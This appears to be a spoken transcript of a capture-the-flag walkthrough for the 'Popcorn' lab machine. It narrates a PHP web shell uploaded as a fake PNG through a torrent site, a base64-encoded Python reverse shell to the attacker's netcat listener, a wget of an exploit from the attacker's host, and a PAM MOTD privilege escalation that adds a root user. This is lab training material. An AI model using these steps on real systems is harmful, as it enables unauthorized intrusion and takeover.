So welcome to Popcorn, which is going to be medium Linux box actually. Let's just start off. So we see that we get a redirect to Popcorn Attack box. I added it to my host file so we can just see the website itself. So if we just go to Popcorn, we can see there's not going to be much. Like, it doesn't really look into things. So first thing we want to do is just a basic directory scan. U is going to be URL, W is word list, and then we have IC for ignore comments, because these word lists do contain comments, and you can see it sort of in your output, which doesn't look too good. First of all, you can look into these things, like what is even as test, for example. We get into PHP, so we know it does run PHP. We can easily see the version, so we might be able to sort of see what kind of vulnerabilities there are with this version. But I'm just going to spoil it. It's going to be torrent. So if we just go through torrent, then we should... Actually, I'm already logged in. Let me just log out. But what you can do is, if you sign up... Oh, sorry, here it is. We can do... we can just sign up as it's like open, I guess it is. So we can just do I think it's OF974. So we can do a register here, and your code is invalid. I'm not good at these. So test. Let's see. Come on. D09D1. Let's register here. So there we go. Now we can actually log in. So if we do a test and a test and log in, we can see we are actually logged in. I already uploaded file, which is just going to be torrent. So if you just go to the Killer Linux download page, there's going to be torrent. But I don't know if I can now change the screenshot. I don't think so. No, we can't. Okay. So what I'm going to do, I'm just going to go back, log into my other account. So essentially I just showed you how to log into this torrent hoster thing. So we're just going to log in here with my other account, and we're going to go to browse. And now we should be able to change this. Nice. So we can see edit this torrent, which is essentially going to be the way, like, what will bring us into the machine. So we're just going to go into edit this torrent, and we see this sort of page that looks kind of odd, right? So what I'm going to do, I just turned on Burp Suite because I do want to record like what is happening. Just go to proxy and set this on. And what we're going to do, we're just going to upload a picture. So I have this beautiful cat, which I just downloaded. Well, it was yesterday, but I just downloaded it, right? We're going to open this and submit screenshot. So what we see here is essentially just an upload page. Like, there's not going to be something special here. It's just going to be upload to torrent upload file PHP with a cat PNG, image PNG, and PNG, blah, blah, blah. Okay, so the way this works, like, what we can do is if we change this to PHP, so it essentially thinks it's going to be cat PNG, but then it concatenates or sort of reads the file. I believe Linux reads the last part. I'm not even sure how this works. It's going to get executed as a PHP file, which is perfect. And then we have PNG. So we can try to delete this. It's better to just leave some PNG stuff there. And we should just go to the end. And don't delete the border because that is needed. I think if we just go here, that's perfectly fine. And right now we do want to insert our PHP actually here, because it's going to get read as a PNG, but it's going to execute it as a PHP. So what I did, I just looked into, actually it's not copied anymore. So PHP, it's something like a request. I'm just going to try to do it. Oh, sorry. I just made a new, okay, wait. PHP request, no, it's system, and it's going to be a get, and then you can do the ID here, for example. Something like this. Let me just see. Oh, sorry, it's in Burp Suite. Let's just send this to the repeater and then let things continue here. So web shells is probably a good place. I already visited this, so I know it's going to be here. You can try to make a web shell here, or a refer shell, which also good. Gonna immediately connect back to you. What I do like to do is just go into this one just to see like the most amount of output I can get, right? So let's just go here and insert this. So what we're gonna do, we can do any command here. Like, you can also change this to something else. It doesn't really matter. But what we're gonna do, we're just gonna go and send this over, and we should get an okay. Please refresh to see the new screenshot. That's perfect. That's perfect. That's good. So what we're gonna do, sorry, wrong one. We're gonna go to our website here. This one, not this one. This one. Where is my... Oh, damn it. It's gone. Okay. Let's just go back here. Browse. So now if we go to the screenshot, we should see a broken image because we changed it. So we can actually click on it. It's not going to really open much, but we want to know like where is this file saved. You can look into the code of torrent host because I believe it's open source. But you can also make a guess. So if you just go to torrent/upload, we can actually see files here, which is going to be pretty cool. So what we're going to do, we're just going to try to open this one, and we see a bunch of broken things, and it looks really weird, like var torrent upload on line 17, what? Well, it tried to execute it. So what we can do is if we do the kick is ID, we can actually see, we get the remote code execution here, which is perfect because we can actually use this. How this works is I wanted to get into, because if we look into the magic bytes of Wikipedia, we can actually change like how this thing is interpreted. So the way a PNG works, it has these magic bytes in the beginning. So there we go. So at 89, 50, 4E, 47, this. The way it works, if I just go through downloads, because that's where it's saved. Then we have file and cat.png. We can see we actually have PNG data, but we can actually change this. So if we just do a hex edit on cat.png, we can see we get a whole bunch of things. And we can see the magic bytes here. So 89, 50, 4E, 47. It's going to be 89, 50, 40, 47. These are the magic bytes. So let's say we want to change this and think it's going to be JPEG. We can see we have FFD8, FFDP. So we can actually do FFD8, FFD... Oh, shit. FFDP. And if we now save this, which I believe is F3, F2, Control X, there we go. So if we now do a file on cat.png, it's going to say JPEG image data. So because we changed these magic bytes, and it even still says it's going to be .png, it got executed as a JPEG, or it's trying to execute as a JPEG, sorry. But you can do the same thing with PHP, which is exactly what we did here. So now that we have this reverse shell, or sorry, this web shell, we actually want to get a proper shell, because then we're actually logged in. Because essentially we can actually go into like and look. Oh, why doesn't that? Hello? Oh, okay. Into and see user is going to be George, so it's going to be cat/home/George/user.txt. But this is not really like the proper way to get this flag. So what we want to do, if we just go to ref shell, we can fill in our things and actually execute it, which I think is pretty cool. So we see our IP in the top right. It's going to be .51 and 9001. We can use bash, sure. Yeah, sure, why not? But maybe we're gonna have a problem here, but let's just try it. So we're gonna do netcat NLVP on 9001, which is good. Then we're gonna go through the website, of course. Just go here, and we should, if we just do this. No, we didn't get a connection. Let's just use Python. I know that works most of the time a bit better. So let's just use this one. Let's see if we... Don't think it matters too much. This one might be the best. Okay, we're gonna just base 64 encode this, because then it doesn't have any spaces or special characters, which is might have trouble with. So what we're gonna do, we're gonna do echo on this one, and then we're gonna do a base 64 decode, and also bash because we want to execute this. And now it's hanging, so that's better. And if we just go to our shell, we can actually see we get a shell back, which is pretty cool. So if we now go into home and George, we can see the flag, so we can see user.txt. Now, because we can't know the password, or like we can't try to brute force it because we have etc password, of course, but we're not going to know the password. So it's going to be really tough. Wait, what? This looks really weird. But we're not going to be able to sort of guess this one. So what we can do, and it's one of these, like you want to find stuff in Linux, so we can use pxaux, or we can look into the mounted host, or we can look into, like you can look into anything. What we're looking for is hidden directories. So if we do a find on /, it's going to be the root, so everything, like everything from that point on. and we want to look for a directory with the name of dot, because essentially how these things work inside of Linux is if it has a dot, it's most of the time going to be configuration files. You even find them on Windows itself. Right, with anything at all, like it doesn't matter what comes out at all. After that, we just want to find it. And we're going to do an ls and then output the errors to def null. We can see we get something inside of George, which is cool because it's not supposed to be here. So let's just actually see if it's there. Well, there we see cache, so we can actually go into cache. And what do we see here? Mod D legal displayed. So man mod D, what do we see? Message of the day. The consoles of etc mod D are displayed by login after successful login, but just before it executes the login shell. Blah, blah, blah. Doesn't matter. What you want to look for, because it's going to be run as George, or it's not going to be run as George, it's managed by appins and it's going to be displayed by every user. It might be interesting to find some sort of exploit maybe. So we're going to do search exploit on mod D, and then we have two. So Linux PAM 110. Like PAM is some sort of specific Linux version. Essentially, if we look into what we have Linux, this one, and Linux PAM is some sort of thing that's installed in here. So dpkg list, and then we want to grab PAM. We can see we get 110, which is the same version as us, meaning basically this should be it. Like this should be our way onto the like root. So what we're gonna do, we're just gonna have to download this one. So we're gonna say search exploit x, and then this should be it into exploit.shell. But I know from experience that if we look into exploit.shell, the first lines are going to be uncommented, so we have to change those things, otherwise it's going to run into an error. I'm not a perfect person with Vim, so I'm just going to use this. No, it's not the best one, but hey, that's all right. We want to get this onto the machine, so we can either copy it or maybe just start a Python web server because, well, we're here anyway, right? So we're just going to go here, and then we're going to go back to our machine, and we're going to do a wget on HTTP 10.10.14.51. It's still going to be the same IP that's going to be on the top right. Download it. Can I write to exploit? Okay, let's just go to TMP and do the same thing. So we are now inside of TMP. So wget HTTP 10.10.14.51 8081 exploit.shell. Exploit save. So now it's actually saved. And you want to change the executable sort of things on these, because right now it's not going to be executable. It's going to be read. So chmod plus x on exploit.shell, and oh, sorry, I was confused. We can now see is actually read, write, execute, read, execute, read, execute, which is the thing we want, right? So if we run this exploit, okay, I'm getting tired here. If we run this exploit, it's gonna set failed. Why? Shouldn't fail. Okay. I don't know. Some reason / executes it in this directory, but it can't. I don't know why. You have to use bash. Just use bash. Maybe it's better. It's an old machine. I don't know. I don't even want to get too much into it. Anyway, if we look into how this exploit works, we can see, like, I'm still not sure how it works, but basically, local root by adding temporary user tor with ID 0 to etc password does not prompt for login by creating temporary SH key and authorized keys. So for some reason, we're able to write to etc password. I tried to look into like how it sort of gets it. I haven't figured it out yet. Like, why does it even need SSH? What does it even matter? But for some reason, it can execute these things as root. So that's just basically how you get the flag. And well, it's going to be the machine.